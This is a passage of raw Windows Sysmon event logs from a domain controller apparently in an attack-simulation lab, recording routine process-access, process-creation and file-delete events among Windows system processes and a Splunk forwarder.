09:19:05.652{5EBD8912-79C0-6151-E577-00000000FC01}42965964C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052125Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.636{5EBD8912-79C0-6151-E577-00000000FC01}42965564C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052124Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.636{5EBD8912-79C0-6151-E577-00000000FC01}42965964C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052123Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.636{5EBD8912-79C0-6151-E577-00000000FC01}42965564C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052122Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.636{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052121Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.636{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052120Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.636{5EBD8912-79C0-6151-E577-00000000FC01}42967028C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052119Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.636{5EBD8912-79C0-6151-E577-00000000FC01}42967028C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052118Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.636{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052117Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.636{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052116Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.615{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052115Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.599{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052114Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.599{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052113Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.584{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052112Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.584{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052111Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.552{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2891AD67749DCF0C171C04D46C40399,SHA256=F6C2761E58F04CC3203CB1C54198BE930EE4B8F8C16C7AE24590A9C9D64C2672,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052110Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.483{5EBD8912-8C89-6151-6C7A-00000000FC01}43964468C:\Windows\system32\LogonUI.exe{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052109Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.452{5EBD8912-7F30-614D-1600-00000000FC01}12681196C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052108Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.452{5EBD8912-7F30-614D-1600-00000000FC01}12681316C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052107Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.452{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052106Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.452{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052105Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.452{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052104Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.452{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052103Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.452{5EBD8912-79BB-6151-D077-00000000FC01}46125756C:\Windows\system32\csrss.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052102Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.452{5EBD8912-79BB-6151-D177-00000000FC01}40284728C:\Windows\system32\winlogon.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+e50a|C:\Windows\system32\winlogon.exe+4cfe|C:\Windows\SYSTEM32\ntdll.dll+80a24|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052101Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.452{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x4 /state0:0xa39de855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e72SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000001052100Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.436{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052099Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.436{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+602a3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052098Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 